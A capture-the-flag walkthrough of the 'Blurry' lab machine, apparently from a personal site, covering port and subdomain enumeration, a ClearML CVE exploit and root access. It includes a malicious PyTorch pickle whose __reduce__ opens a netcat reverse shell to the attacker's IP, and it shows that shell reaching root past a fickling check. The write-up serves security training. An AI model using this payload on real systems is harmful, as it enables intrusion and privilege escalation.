hi@hectortoral.com

Blurry

linux · medium

Enumeration

sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn --disable-arp-ping 10.10.11.19 -oG allPorts

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63
sudo nmap -p22,80 -sCV 10.10.11.19 -oN targeted

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)
|   256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA)
|_  256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-title: Did not follow redirect to http://app.blurry.htb/
|_http-server-header: nginx/1.18.0
sudo sh -c 'echo "10.10.11.19 blurry.htb app.blurry.htb" >> /etc/hosts'
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://blurry.htb -H "Host: FUZZ.blurry.htb" -fs 169

files                   [Status: 200, Size: 2, Words: 1, Lines: 1, Duration: 61ms]
app                     [Status: 200, Size: 13327, Words: 382, Lines: 29, Duration: 56ms]
chat                    [Status: 200, Size: 218733, Words: 12692, Lines: 449, Duration: 130ms]
certificate icon previous icon next icon
certificate icon
share icon add icon settings icon

certificate icon previous icon next icon
certificate icon
share icon add icon settings icon

jippity

Exploitation

sudo apt install python3.11-venv
python3 -m venv .env
source .env/bin/activate
pip install clearml
clearml-init
api {
  web_server: http://app.blurry.htb
  api_server: http://api.blurry.htb
  files_server: http://files.blurry.htb
  credentials {
    "access_key" = "B0KCP3QYFV1IZFS9SRY2"
    "secret_key" = "I6iImsuAGcxECntt3HZSYwkoMtmoZJ9NYyy0eNGQBQ0Ol3VhMH"
  }
}

https://github.com/DemonPandaz2763/CVE-2024-24590.git

jippity@blurry:~$ cat user.txt
85fdd3c30f09caeb0fd4fa4dbec25fb1

Privilege escalation

jippity@blurry:~$ sudo -l
Matching Defaults entries for jippity on blurry:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jippity may run the following commands on blurry:
    (root) NOPASSWD: /usr/bin/evaluate_model /models/*.pth
drwxrwxr-x   2 root jippity  4096 Jun 14 15:22 models
import torch
import torch.nn as nn
import os

class Exploit(nn.Module):
    def __init__(self):
        super(Exploit, self).__init__()
        self.dense = nn.Linear(10, 1)

    def forward(self, x):
        return self.dense(x)

    def __reduce__(self):
        cmd = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.36 4000 >/tmp/f"
        return os.system, (cmd,)

model = Exploit()
torch.save(model, 'exploit.pth')
python3 -m http.server 80
jippity@blurry:/models$ wget http://10.10.14.36/exploit.pth             
--2024-06-14 15:20:51--  http://10.10.14.36/exploit.pth
Connecting to 10.10.14.36:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 928 [application/octet-stream]
Saving to: ‘exploit.pth’

exploit.pth         100%[===================>]     928  --.-KB/s    in 0s      

2024-06-14 15:20:51 (67.4 MB/s) - ‘exploit.pth’ saved [928/928]
jippity@blurry:~$ sudo /usr/bin/evaluate_model /models/exploit.pth
[+] Model /models/exploit.pth is considered safe. Processing...
nc -lvnp 4000            
listening on [any] 4000 ...
connect to [10.10.14.36] from (UNKNOWN) [10.10.11.19] 56866
# cat /root/root.txt
5175188a6a603edf71faf262642027ca

Appendices

/usr/bin/evaluate_model

#!/bin/bash
# Evaluate a given model against our proprietary dataset.
# Security checks against model file included.

if [ "$#" -ne 1 ]; then
    /usr/bin/echo "Usage: $0 <path_to_model.pth>"
    exit 1
fi

MODEL_FILE="$1"
TEMP_DIR="/models/temp"
PYTHON_SCRIPT="/models/evaluate_model.py"  

/usr/bin/mkdir -p "$TEMP_DIR"

file_type=$(/usr/bin/file --brief "$MODEL_FILE")

# Extract based on file type
if [[ "$file_type" == *"POSIX tar archive"* ]]; then
    # POSIX tar archive (older PyTorch format)
    /usr/bin/tar -xf "$MODEL_FILE" -C "$TEMP_DIR"
elif [[ "$file_type" == *"Zip archive data"* ]]; then
    # Zip archive (newer PyTorch format)
    /usr/bin/unzip -q "$MODEL_FILE" -d "$TEMP_DIR"
else
    /usr/bin/echo "[!] Unknown or unsupported file format for $MODEL_FILE"
    exit 2
fi

/usr/bin/find "$TEMP_DIR" -type f \( -name "*.pkl" -o -name "pickle" \) -print0 | while IFS= read -r -d $'\0' extracted_pkl; do
    fickling_output=$(/usr/local/bin/fickling -s --json-output /dev/fd/1 "$extracted_pkl")

    if /usr/bin/echo "$fickling_output" | /usr/bin/jq -e 'select(.severity == "OVERTLY_MALICIOUS")' >/dev/null; then
        /usr/bin/echo "[!] Model $MODEL_FILE contains OVERTLY_MALICIOUS components and will be deleted."
        /bin/rm "$MODEL_FILE"
        break
    fi
done

/usr/bin/find "$TEMP_DIR" -type f -exec /bin/rm {} +
/bin/rm -rf "$TEMP_DIR"

if [ -f "$MODEL_FILE" ]; then
    /usr/bin/echo "[+] Model $MODEL_FILE is considered safe. Processing..."
    /usr/bin/python3 "$PYTHON_SCRIPT" "$MODEL_FILE"
    
fi
import torch
import torch.nn as nn
from torchvision import transforms
from torchvision.datasets import CIFAR10
from torch.utils.data import DataLoader, Subset
import numpy as np
import sys


class CustomCNN(nn.Module):
    def __init__(self):
        super(CustomCNN, self).__init__()
        self.conv1 = nn.Conv2d(in_channels=3, out_channels=16, kernel_size=3, padding=1)
        self.conv2 = nn.Conv2d(in_channels=16, out_channels=32, kernel_size=3, padding=1)
        self.pool = nn.MaxPool2d(kernel_size=2, stride=2, padding=0)
        self.fc1 = nn.Linear(in_features=32 * 8 * 8, out_features=128)
        self.fc2 = nn.Linear(in_features=128, out_features=10)
        self.relu = nn.ReLU()

    def forward(self, x):
        x = self.pool(self.relu(self.conv1(x)))
        x = self.pool(self.relu(self.conv2(x)))
        x = x.view(-1, 32 * 8 * 8)
        x = self.relu(self.fc1(x))
        x = self.fc2(x)
        return x


def load_model(model_path):
    model = CustomCNN()
    
    state_dict = torch.load(model_path)
    model.load_state_dict(state_dict)
    
    model.eval()  
    return model

def prepare_dataloader(batch_size=32):
    transform = transforms.Compose([
        transforms.RandomHorizontalFlip(),
        transforms.RandomCrop(32, padding=4),
        transforms.ToTensor(),
        transforms.Normalize(mean=[0.4914, 0.4822, 0.4465], std=[0.2023, 0.1994, 0.2010]),
    ])
    
    dataset = CIFAR10(root='/root/datasets/', train=False, download=False, transform=transform)
    subset = Subset(dataset, indices=np.random.choice(len(dataset), 64, replace=False))
    dataloader = DataLoader(subset, batch_size=batch_size, shuffle=False)
    return dataloader

def evaluate_model(model, dataloader):
    correct = 0
    total = 0
    with torch.no_grad():  
        for images, labels in dataloader:
            outputs = model(images)
            _, predicted = torch.max(outputs.data, 1)
            total += labels.size(0)
            correct += (predicted == labels).sum().item()
    
    accuracy = 100 * correct / total
    print(f'[+] Accuracy of the model on the test dataset: {accuracy:.2f}%')

def main(model_path):
    model = load_model(model_path)
    print("[+] Loaded Model.")
    dataloader = prepare_dataloader()
    print("[+] Dataloader ready. Evaluating model...")
    evaluate_model(model, dataloader)

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python script.py <path_to_model.pth>")
    else:
        model_path = sys.argv[1]  # Path to the .pth file
        main(model_path)